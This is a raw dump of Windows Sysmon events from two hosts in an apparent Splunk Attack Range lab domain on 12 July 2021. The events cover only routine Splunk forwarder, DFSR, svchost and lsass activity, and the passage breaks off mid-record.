10341000x80000000000000001055089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.670{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.655{466BC892-F895-60EB-057E-00000000CF01}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.623{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF16819A5F400BCAE906CAA40A435A37,SHA256=58BF1B3C4519BD7CDB6E41A15DF8B95E6C4AAC22BE8536AF8792A4CDCC6D7744,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:53.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C91CB36329154C9B36939BB43A73A1BE,SHA256=69A468DD33F00EAAF6D13508B5DFA51DF6446AAC3068D519016E27D7111AD1E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:53.269{466BC892-F894-60EB-047E-00000000CF01}8412840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001055079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:53.107{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001055078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:53.107{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001055077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:53.107{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 23542300x8000000000000000810587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:54.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=195533F5E1710FCD2CC3A04058B4CC72,SHA256=112CC168426B11F714BD3F4F3359E2D3431B41EE37D3557A3238D682E9134F8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.653{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61985-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.652{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61985-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.639{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61984-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.639{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61984-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001055102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.611{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001055101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:46.611{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001055100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.623{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35298C34B0A32006C49194F50F0F71BC,SHA256=219A6AD6D32BD5A005DA71F4B1DDA0E91FA726BD65E821F9471DB6FC31B76257,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.191{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:54.186{466BC892-F896-60EB-067E-00000000CF01}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:55.625{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC30611FB985E140A56797DFFCA283B0,SHA256=529C868590A20EB4137CC865729D09CE83949E93EF79D57778349B824D444092,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:54.196{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57478-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:55.572{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94A07BD663CAF1A45412FB7F6676792D,SHA256=0367CA19A3E86DC249A7233E93C06CCD217B88B34BAC3E4FDBFD2954ADD288DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:55.239{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C9080EF0D9944730F4E6C39619FA554,SHA256=FBF509BD19E67ACB6AFA76AB6DE8AE5263E9840736C8613A4F2874C06B79B9B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:47.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61986-false10.0.1.12-8000- 23542300x80000000000000001055109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:56.639{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BB2948E50AA2E5A1B21A275DB4919CD,SHA256=1A422E4018C757B6E738ECA3CCA5F685B1CBFE13562BD0232EB3029694F40477,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:56.619{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43EB39DA8F4160F7F7D4A885F0558DA6,SHA256=D08219BC2138093AC7E6EAB11B81DE8C30EF066B350EAEE4A4B230185D8B8A45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:57.635{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69DF74F4B65DD01E84BCABA0EB664E41,SHA256=C2087F59542F68232C377F789967628944615F0053D81CE14FE8E1B6438EDC90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:57.640{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC8197BB097E044EEC83D319071D9E4,SHA256=D36A17B74816AA617FD683E818AFCAC1138057627D1DC34013FC09272B779307,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:57.425{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:58.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 